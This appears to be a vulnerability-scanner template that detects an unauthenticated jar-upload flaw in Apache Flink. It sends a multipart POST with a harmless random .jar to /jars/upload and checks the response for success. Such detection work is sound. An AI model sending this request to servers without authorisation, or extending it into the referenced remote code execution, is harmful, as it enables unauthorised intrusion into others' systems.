id: flink-unauth-rce

info:
  name: Apache Flink Unauth RCE
  author: pikpikcu
  severity: critical
  verified: true
  reference:
    - https://www.exploit-db.com/exploits/48978
    - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
    - https://github.com/LandGrey/flink-unauth-rce

set:
    randstr: randomLowercase(8)
    randbody: md5(randstr)
    r2: randomLowercase(4)
    rboundary: randomLowercase(8)
rules:
    r0:
        request:
            method: POST
            path: /jars/upload
            headers:
                Content-Type: multipart/form-data;boundary=WebKitFormBoundary{{rboundary}}
            body: "\
                --WebKitFormBoundary{{rboundary}}\r\n\
                Content-Disposition: form-data; name=\"jarfile\";filename=\"{{r2}}.jar\"\r\n\
                Content-Type:application/octet-stream\r\n\
                \r\n\
                {{randbody}}\r\n\
                --WebKitFormBoundary{{rboundary}}--\r\n\
                "
            follow_redirects: true
        expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"success") && response.body.bcontains(bytes('_'+r2+'.jar'))
        
expression: r0()
